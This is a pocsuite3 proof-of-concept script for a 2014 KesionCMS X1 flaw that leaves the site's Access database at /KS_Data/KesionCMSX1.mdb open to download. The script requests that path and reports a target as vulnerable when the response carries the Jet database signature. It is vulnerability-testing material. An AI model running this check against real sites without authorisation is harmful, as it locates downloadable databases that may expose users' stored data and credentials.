KesionCMS X1 /KS_Data/KesionCMSX1.mdb 数据库发现漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str from requests.exceptions import ReadTimeout class DemoPOC(POCBase): vulID = '1503' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2014­08­20' createDate = '2014-09-09' updateDate = '2014-09-09' references = ['http://wooyun.org/bugs/wooyun-2014-072949'] name = 'KesionCMS X1 /KS_Data/KesionCMSX1.mdb 数据库发现漏洞 POC' appPowerLink = 'http://www.kesion.com' appName = 'KesionCMS' appVersion = 'X1#' vulType = 'Database Found' desc = ''' 数据没有加#导致可任意下载 ''' samples = [] install_requires = [''] def _verify(self): result = {} try: payload = "/KS_Data/KesionCMSX1.mdb" Database_url = self.url + payload content = requests.get(Database_url).text if "Standard Jet DB" in content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Filename'] = Database_url result['VerifyInfo']['Filecontent'] = 'mdb' except Exception as e: logger.exception(e) return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() def _shell(self): pass register_poc(DemoPOC)